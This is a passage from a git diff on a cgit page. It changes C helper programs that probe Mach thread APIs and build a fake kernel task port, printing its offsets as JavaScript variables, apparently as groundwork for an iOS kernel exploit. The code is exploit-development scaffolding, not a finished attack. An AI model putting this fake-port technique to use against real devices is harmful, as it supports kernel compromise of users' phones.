- // 707 10580c 105848 1057c8 1057c4 41414141 105850 1 0 0 0 0
- printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141);
-
- printf("still alive?\n");
- printf("%x\n", *(uint32_t*)0x1300000);
- kr = thread_create(mytask, 0x1300000);
- printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
-
- printf("%x\n", *(uint32_t*)0x1300000);
- printf("still alive?\n");
- kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1301008, 0x1301000);
-
- printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
- printf("still alive?\n");
- *(uint32_t*)0x1302008 = 0x41414141;
- kr = thread_set_state(0x1300000, ARM_THREAD_STATE, 0x1305008, ARM_THREAD_STATE_COUNT);
-
- printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
- kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1304008, 0x1301000);
-
- printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
- printf("%x\n", *(uint32_t*)0x1302008);
- printf("still alive?\n");
- kr = thread_resume(0x1300000);
-
- printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
- printf("still alive?\n");
-
- printf("still alive?\n");
-
- return 0;
+#include <mach/mach.h>
+#include <sys/mman.h>
+#include <stdio.h>
+
+int main(int argc, char* argv[]) {
+ kern_return_t kr;
+ thread_t th;
+ mach_port_name_t mytask, mythread;
+ arm_thread_state_t state;
+ mach_msg_type_number_t count;
+ printf("Hello, world!\n");
+ mytask = mach_task_self();
+ mythread = mach_thread_self();
+
+ printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141);
+ mmap(0x1300000, 0x100000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0);
+ printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141);
+
+ *(uint32_t*)0x1301004 = 0x1300100;
+ *(uint32_t*)0x1301008 = 0x1300200;
+ *(uint32_t*)0x1301000 = 0x1300000;
+
+ *(uint32_t*)0x1302000 = 0x1301000;
+ *(uint32_t*)0x1302004 = 0x1301004;
+ *(uint32_t*)0x1302008 = 0x1301008;
+
+ *(uint32_t*)0x1304008 = 0x1303008;
+ *(uint32_t*)0x1305008 = 0x1304008;
+
+ printf("%d(%x) %d(%x)\n", ARM_THREAD_STATE, ARM_THREAD_STATE, ARM_THREAD_STATE_COUNT, ARM_THREAD_STATE_COUNT);
+
+ // 707 10580c 105848 1057c8 1057c4 41414141 105850 1 0 0 0 0
+ printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141);
+
+ printf("still alive?\n");
+ printf("%x\n", *(uint32_t*)0x1300000);
+ kr = thread_create(mytask, 0x1300000);
+ printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
+
+ printf("%x\n", *(uint32_t*)0x1300000);
+ printf("still alive?\n");
+ kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1301008, 0x1301000);
+
+ printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
+ printf("still alive?\n");
+ *(uint32_t*)0x1302008 = 0x41414141;
+ kr = thread_set_state(0x1300000, ARM_THREAD_STATE, 0x1305008, ARM_THREAD_STATE_COUNT);
+
+ printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
+ kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1304008, 0x1301000);
+
+ printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
+ printf("%x\n", *(uint32_t*)0x1302008);
+ printf("still alive?\n");
+ kr = thread_resume(0x1300000);
+
+ printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr));
+ printf("still alive?\n");
+
+ printf("still alive?\n");
+
+ return 0;
} \ No newline at end of file
diff --git a/tools/test.c b/tools/test.c
index 6682971..6682971 100644..100755
--- a/tools/test.c
+++ b/tools/test.c
diff --git a/tools/testlol.c b/tools/testlol.c
index 5849b99..362b6fa 100644..100755
--- a/tools/testlol.c
+++ b/tools/testlol.c
@@ -1,99 +1,101 @@
-#include <mach/mach.h>
-#include <stddef.h>
-#include <stdio.h>
-//#include <IOKit/IOKitLib.h>
-//#include <IOKit/iokitmig.h>
-
-typedef struct __attribute__((__packed__)) {
- uint32_t ip_bits;
- uint32_t ip_references;
- struct __attribute__((__packed__)) {
- uint32_t data;
- uint32_t pad;
- uint32_t type;
- } ip_lock;
- struct __attribute__((__packed__)) {
- struct __attribute__((__packed__)) {
- struct __attribute__((__packed__)) {
- uint32_t flags;
- uintptr_t waitq_interlock;
- uint64_t waitq_set_id;
- uint64_t waitq_prepost_id;
- struct __attribute__((__packed__)) {
- uintptr_t next;
- uintptr_t prev;
- } waitq_queue;
- } waitq;
- uintptr_t messages;
- natural_t seqno;
- natural_t receiver_name;
- uint16_t msgcount;
- uint16_t qlimit;
- } port;
- uintptr_t imq_klist;
- } ip_messages;
- natural_t ip_flags;
- uintptr_t ip_receiver;
- uintptr_t ip_kobject;
- uintptr_t ip_nsrequest;
- uintptr_t ip_pdrequest;
- uintptr_t ip_requests;
- uintptr_t ip_premsg;
- uint64_t ip_context;
- natural_t ip_mscount;
- natural_t ip_srights;
- natural_t ip_sorights;
-} kport_t;
-
-int main(int argc, char* argv[]) {
- printf("var MACH_PORT_RIGHT_RECEIVE = 0x%x;\n", MACH_PORT_RIGHT_RECEIVE);
- printf("var MACH_MSG_TYPE_MAKE_SEND = 0x%x;\n", MACH_MSG_TYPE_MAKE_SEND);
- printf("var MACH_PORT_LIMITS_INFO = 0x%x;\n", MACH_PORT_LIMITS_INFO);
- printf("var MACH_PORT_LIMITS_INFO_COUNT = 0x%x;\n", MACH_PORT_LIMITS_INFO_COUNT);
- printf("var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x%x;\n", MACH_MSG_OOL_PORTS_DESCRIPTOR);
- printf("var kport_size = 0x%x;\n", sizeof(kport_t));
- kport_t kport[2] = {};
- uintptr_t *ptr = (uintptr_t*)(kport + 1);
- kport->ip_bits = 0x80000002; // IO_BITS_ACTIVE | IOT_PORT | IKOT_TASK
- kport->ip_references = 100;
- kport->ip_lock.type = 0x11;
- kport->ip_messages.port.qlimit = 777;
- kport->ip_receiver = 0x12345678; // dummy
- kport->ip_srights = 99;
- typedef struct {
- mach_msg_header_t Head;
- mach_msg_body_t msgh_body;
- mach_msg_ool_ports_descriptor_t init_port_set[0];
- } Request;
-
- printf("%x\n", sizeof(Request));
- printf("%x\n", sizeof(mach_msg_ool_ports_descriptor_t));
- printf("var req_init_port_set = 0x%x\n", offsetof(Request, init_port_set));
- printf("var req_init_port_set_address = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, address));
- printf("var req_init_port_set_count = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, count));
-// printf("var req_init_port_set_disposition = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, disposition));
-// printf("var req_init_port_set_deallocate = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, deallocate));
-// printf("var req_init_port_set_type = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, type));
- printf("var req_head_msgh_bits = 0x%x\n", offsetof(Request, Head.msgh_bits));
- printf("var req_head_msgh_request_port = 0x%x\n", offsetof(Request, Head.msgh_remote_port));
- printf("var req_head_msgh_reply_port = 0x%x\n", offsetof(Request, Head.msgh_local_port));
- printf("var req_head_msgh_id = 0x%x\n", offsetof(Request, Head.msgh_id));
- printf("var req_msgh_body_msgh_descriptor_count = 0x%x\n", offsetof(Request, msgh_body.msgh_descriptor_count));
-
- printf("%x\n", sizeof(mach_msg_header_t));
-
- printf("%x\n", MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE));
- printf("%x\n", MACH_SEND_MSG|MACH_MSG_OPTION_NONE);
- printf("%x\n", MACH_MSG_TIMEOUT_NONE);
-
- printf("var kport_ip_bits%x = 0x%x;\n", 4, offsetof(kport_t, ip_bits));
- printf("var kport_ip_references%x = 0x%x;\n", 4, offsetof(kport_t, ip_references));
- printf("var kport_ip_lock_type%x = 0x%x;\n", 4, offsetof(kport_t, ip_lock.type));
- printf("var kport_ip_messages_port_qlimit%x = 0x%x;\n", 2, offsetof(kport_t, ip_messages.port.qlimit));
- printf("var kport_ip_receiver%x = 0x%x;\n", 4, offsetof(kport_t, ip_receiver));
- printf("var kport_ip_srights%x = 0x%x;\n", 4, offsetof(kport_t, ip_srights));
- printf("var MIG_MAX = 0x%x\n", 0x1000);
- printf("var NDR_record = %x %x %x %x\n", NDR_record);
-
- return 0;
+#include <mach/mach.h>
+#include <sys/mman.h>
+#include <stddef.h>
+#include <stdio.h>
+//#include <IOKit/IOKitLib.h>
+//#include <IOKit/iokitmig.h>
+
+typedef struct __attribute__((__packed__)) {
+ uint32_t ip_bits;
+ uint32_t ip_references;
+ struct __attribute__((__packed__)) {
+ uint32_t data;
+ uint32_t pad;
+ uint32_t type;
+ } ip_lock;
+ struct __attribute__((__packed__)) {
+ struct __attribute__((__packed__)) {
+ struct __attribute__((__packed__)) {
+ uint32_t flags;
+ uintptr_t waitq_interlock;
+ uint64_t waitq_set_id;
+ uint64_t waitq_prepost_id;
+ struct __attribute__((__packed__)) {
+ uintptr_t next;
+ uintptr_t prev;
+ } waitq_queue;
+ } waitq;
+ uintptr_t messages;
+ natural_t seqno;
+ natural_t receiver_name;
+ uint16_t msgcount;
+ uint16_t qlimit;
+ } port;
+ uintptr_t imq_klist;
+ } ip_messages;
+ natural_t ip_flags;
+ uintptr_t ip_receiver;
+ uintptr_t ip_kobject;
+ uintptr_t ip_nsrequest;
+ uintptr_t ip_pdrequest;
+ uintptr_t ip_requests;
+ uintptr_t ip_premsg;
+ uint64_t ip_context;
+ natural_t ip_mscount;
+ natural_t ip_srights;
+ natural_t ip_sorights;
+} kport_t;
+
+int main(int argc, char* argv[]) {
+ printf("var MACH_PORT_RIGHT_RECEIVE = 0x%x;\n", MACH_PORT_RIGHT_RECEIVE);
+ printf("var MACH_MSG_TYPE_MAKE_SEND = 0x%x;\n", MACH_MSG_TYPE_MAKE_SEND);
+ printf("var MACH_PORT_LIMITS_INFO = 0x%x;\n", MACH_PORT_LIMITS_INFO);
+ printf("var MACH_PORT_LIMITS_INFO_COUNT = 0x%x;\n", MACH_PORT_LIMITS_INFO_COUNT);
+ printf("var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x%x;\n", MACH_MSG_OOL_PORTS_DESCRIPTOR);
+ printf("var kport_size = 0x%x;\n", sizeof(kport_t));
+ kport_t kport[2] = {};
+ uintptr_t *ptr = (uintptr_t*)(kport + 1);
+ kport->ip_bits = 0x80000002; // IO_BITS_ACTIVE | IOT_PORT | IKOT_TASK
+ kport->ip_references = 100;
+ kport->ip_lock.type = 0x11;
+ kport->ip_messages.port.qlimit = 777;
+ kport->ip_receiver = 0x12345678; // dummy
+ kport->ip_srights = 99;
+ typedef struct {
+ mach_msg_header_t Head;
+ mach_msg_body_t msgh_body;
+ mach_msg_ool_ports_descriptor_t init_port_set[0];
+ } Request;
+
+ printf("%x\n", sizeof(Request));
+ printf("%x\n", sizeof(mach_msg_ool_ports_descriptor_t));
+ printf("var req_init_port_set = 0x%x\n", offsetof(Request, init_port_set));
+ printf("var req_init_port_set_address = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, address));
+ printf("var req_init_port_set_count = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, count));
+ printf("%x %x %x %x %x\n", PROT_READ, PROT_WRITE, PROT_EXEC, MAP_PRIVATE, MAP_ANON);
+// printf("var req_init_port_set_disposition = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, disposition));
+// printf("var req_init_port_set_deallocate = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, deallocate));
+// printf("var req_init_port_set_type = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, type));
+ printf("var req_head_msgh_bits = 0x%x\n", offsetof(Request, Head.msgh_bits));
+ printf("var req_head_msgh_request_port = 0x%x\n", offsetof(Request, Head.msgh_remote_port));
+ printf("var req_head_msgh_reply_port = 0x%x\n", offsetof(Request, Head.msgh_local_port));
+ printf("var req_head_msgh_id = 0x%x\n", offsetof(Request, Head.msgh_id));
+ printf("var req_msgh_body_msgh_descriptor_count = 0x%x\n", offsetof(Request, msgh_body.msgh_descriptor_count));
+
+ printf("%x\n", sizeof(mach_msg_header_t));
+
+ printf("%x\n", MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE));
+ printf("%x\n", MACH_SEND_MSG|MACH_MSG_OPTION_NONE);
+ printf("%x\n", MACH_MSG_TIMEOUT_NONE);
+
+ printf("var kport_ip_bits%x = 0x%x;\n", 4, offsetof(kport_t, ip_bits));
+ printf("var kport_ip_references%x = 0x%x;\n", 4, offsetof(kport_t, ip_references));
+ printf("var kport_ip_lock_type%x = 0x%x;\n", 4, offsetof(kport_t, ip_lock.type));
+ printf("var kport_ip_messages_port_qlimit%x = 0x%x;\n", 2, offsetof(kport_t, ip_messages.port.qlimit));
+ printf("var kport_ip_receiver%x = 0x%x;\n", 4, offsetof(kport_t, ip_receiver));
+ printf("var kport_ip_srights%x = 0x%x;\n", 4, offsetof(kport_t, ip_srights));
+ printf("var MIG_MAX = 0x%x\n", 0x1000);
+ printf("var NDR_record = %x %x %x %x\n", NDR_record);
+
+ return 0;
} \ No newline at end of file
diff --git a/tools/thread_shit.c b/tools/thread_shit.c
index cbfbe23..cbfbe23 100644..100755
--- a/tools/thread_shit.c
+++ b/tools/thread_shit.c
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:04:41 +0000